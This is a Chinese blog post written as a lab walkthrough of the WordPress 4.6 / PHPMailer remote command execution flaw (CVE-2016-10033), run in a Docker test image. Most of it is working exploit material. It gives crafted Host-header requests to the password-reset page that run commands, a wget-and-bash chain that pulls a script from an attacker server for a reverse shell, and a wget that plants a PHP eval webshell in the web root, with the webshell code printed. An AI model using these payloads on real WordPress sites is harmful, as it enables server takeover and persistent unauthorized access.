欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

WordPress小于等于4.6 命令执行漏洞(PHPMailer)(CVE-2016-10033)实验

程序员文章站 2022-03-05 13:48:54
...

WordPress <= 4.6 命令执行漏洞(PHPMailer)(CVE-2016-10033)实验

0x00

此漏洞利用的是HTTP头部注入,参考资料:http://www.freebuf.com/articles/web/164817.html

首先祭出实验来源:http://vulapps.evalbug.com/w_wordpress_6/

实验环境需要docker来挂载,docker安装教程:https://blog.csdn.net/levones/article/details/80474994

0x01

WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造成远程命令执行的危害。

0x02

拉取镜像到本地计算机(ubuntu16.04)

docker pull medicean/vulapps:w_wordpress_6

启动实验环境

docker run -d -p 8000:80 medicean/vulapps:w_wordpress_6

WordPress小于等于4.6 命令执行漏洞(PHPMailer)(CVE-2016-10033)实验

WordPress小于等于4.6 命令执行漏洞(PHPMailer)(CVE-2016-10033)实验

WordPress小于等于4.6 命令执行漏洞(PHPMailer)(CVE-2016-10033)实验

如果上述步骤没有出现错误的话访问ip:port可以看到如下界面:

WordPress小于等于4.6 命令执行漏洞(PHPMailer)(CVE-2016-10033)实验

0x03

POC

POST /wp-login.php?action=lostpassword HTTP/1.1
Host: target(any aaa@qq.com -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}var${substr{0}{1}{$spool_directory}}www${substr{0}{1}{$spool_directory}}html${substr{0}{1}{$spool_directory}}test}} null)
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Content-Length: 56
Content-Type: application/x-www-form-urlencoded

wp-submit=Get+New+Password&redirect_to=&user_login=admin

将此poc通过burp suite进行重放,IP和端口自行设定。重放前访问http://ip:port/test时返回404

WordPress小于等于4.6 命令执行漏洞(PHPMailer)(CVE-2016-10033)实验

重放后再次访问会返回200ok,此时说明POC中执行的命令:

/bin/touch /var/www/html/test

执行成功,由此验证了此版本的WordPress存在命令执行漏洞。

0x04

EXP 利用漏洞

思路一:直接进行命令执行反弹shell

通过wget下载bash脚本然后执行

注意事项:

  1. 远程 URL 中不要有 http://
  2. 所有字母必须小写
  3. 所有 / 用 ${substr{0}{1}{$spool_directory}} 代替
  4. 所有 空格 用 ${substr{10}{1}{$tod_log}} 代替

下载:

/usr/bin/wget --output-document /tmp/rce your_server_ip/example.txt
POST /wp-login.php?action=lostpassword HTTP/1.1
Host: target(any aaa@qq.com -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}rce your_server_ip${substr{0}{1}{$spool_directory}}example.txt}} null)
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Content-Length: 56
Content-Type: application/x-www-form-urlencoded

wp-submit=Get+New+Password&redirect_to=&user_login=admin

执行:

/bin/bash /tmp/rce
POST /wp-login.php?action=lostpassword HTTP/1.1
Host: target(any aaa@qq.com -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}rce}} null)
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Content-Length: 56
Content-Type: application/x-www-form-urlencoded

wp-submit=Get+New+Password&redirect_to=&user_login=admin

思路二:写入webshell再用菜刀连接

/usr/bin/wget --output-document /var/www/html/webshell.php raw.githubusercontent.com/medicean/vulapps/master/w/wordpress/6/webshell.php

注意事项:

  1. 远程 URL 中不要有 http://
  2. 所有字母必须小写
  3. 所有 / 用 ${substr{0}{1}{$spool_directory}} 代替
  4. 所有 空格 用 ${substr{10}{1}{$tod_log}} 代替

重放包:

POST /wp-login.php?action=lostpassword HTTP/1.1
Host: target(any aaa@qq.com -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}var${substr{0}{1}{$spool_directory}}www${substr{0}{1}{$spool_directory}}html${substr{0}{1}{$spool_directory}}webshell.php${substr{10}{1}{$tod_log}}raw.githubusercontent.com${substr{0}{1}{$spool_directory}}medicean${substr{0}{1}{$spool_directory}}vulapps${substr{0}{1}{$spool_directory}}master${substr{0}{1}{$spool_directory}}w${substr{0}{1}{$spool_directory}}wordpress${substr{0}{1}{$spool_directory}}6${substr{0}{1}{$spool_directory}}webshell.php}} null)
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Content-Length: 56
Content-Type: application/x-www-form-urlencoded

wp-submit=Get+New+Password&redirect_to=&user_login=admin

重放此数据包后网站根目录下多了一个webshell.php

<?php @eval($_POST['ant']);?>

此时可以用菜刀连接发现连接成功。

WordPress小于等于4.6 命令执行漏洞(PHPMailer)(CVE-2016-10033)实验